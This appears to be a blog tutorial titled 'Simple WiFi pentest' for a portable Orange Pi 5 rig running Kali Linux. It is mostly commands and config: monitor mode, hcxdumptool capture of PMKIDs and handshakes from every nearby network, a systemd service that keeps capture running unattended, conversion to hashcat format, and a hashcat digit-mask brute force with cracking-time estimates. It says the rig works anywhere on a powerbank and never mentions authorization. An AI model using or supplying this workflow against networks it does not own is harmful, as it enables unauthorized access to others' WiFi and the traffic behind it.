Simple WiFi pentest⌗

Hardware⌗

Orange Pi 5 + TP-Link Archer T2U PLUS [RTL8821AU]⌗

The OS is Kali Linux. Don’t forget to do rm /boot/*cloud-arm64* && /usr/sbin/u-boot-update after apt update && apt upgrade otherwise you can’t boot after reboot. In my case, the main reason for the appearance incorrect kernel is apt install wireguard. As you can see

└─# apt depends wireguard
wireguard
 |Depends: <wireguard-modules> (>= 0.0.20191219)
    linux-image-arm64
    linux-image-cloud-arm64

you can use it in any place with powerbank.

Some computer with video card⌗

In my case it’s Gentoo with GeForce RTX 3070 Lite Hash Rate

Orange PI 5⌗

Prepare⌗

apt update
apt install tshark hcxdumptool hcxtools iw bettercap

Exclude wlan0 from NodeManager⌗

Update /etc/NetworkManager/NetworkManager.conf and restart NetworkManager

[main]
plugins=ifupdown,keyfile

[ifupdown]
managed=false

[keyfile]
unmanaged-devices=interface-name:wlan0

Run⌗

# Setup monitor mode
ip link set wlan0 down && iw wlan0 set monitor none && ip link set wlan0 up
# Run tool for hcxdumptool 6.3.1 (C) 2023 ZeroBeat
hcxdumptool -i wlan0 -w wlan0.pcapng
# wait

You can use systemd service like this

[Unit]
Description=WiFi scan

[Service]
Type=simple
Environment=TERM=xterm
ExecStartPre=/usr/bin/ip link set wlan0 down
ExecStartPre=/usr/sbin/iw wlan0 set monitor none
ExecStartPre=/usr/bin/ip link set wlan0 up
ExecStartPre=-/usr/bin/bash -c '/usr/bin/mv /var/log/wifi-dump/wlan0.pcapng /var/log/wifi-dump/wlan0-$(date +%%Y%%m%%d-%%H%%M%%S).pcapng'
ExecStart=bash -c 'TERM=xterm; /usr/bin/hcxdumptool -i wlan0 -w /var/log/wifi-dump/wlan0.pcapng'
Restart=always
RestartSec=30

[Install]
WantedBy=multi-user.target

After or during waiting

# Dump to hc22000 file format, watch into 'PMKID (best)'
hcxpcapngtool -o wlan0.hc22000 wlan0.pcapng
# Get info from wlan0.hc22000
hcxhashtool -i wlan0.hc22000 --info=stdout

You can run something like this bettercap -iface wlan0 -eval 'wifi.recon on; set ticker.period 5; set ticker.commands "wifi.show"; ticker on' at the same time for watching in real time.

Gentoo⌗

Prepare⌗

eselect repository enable pentoo
eix-sync
eix-update
emerge hcxtools

Try to find something interesting⌗

Simple ans stupid brute force with all digest from 000000000 (minimal wifi password length) to 999999999999 (like mobile phone number)

hashcat -m 22000 wlan0.hc22000 -a3 --increment -w3 \
  --increment-max 11 \
  --increment-min 8 \
  '?d?d?d?d?d?d?d?d?d?d?d'
# press s to check status
# run any time if you want get current status with the found
hashcat -m 22000 wlan0.hc22000 --show

Timings:

• 8 digits ~ 18 minutes
• 9 digits ~ 3 hours
• 10 digits ~ 1 day, 5 hours
• 11 digist ~ 12 days, 9 hours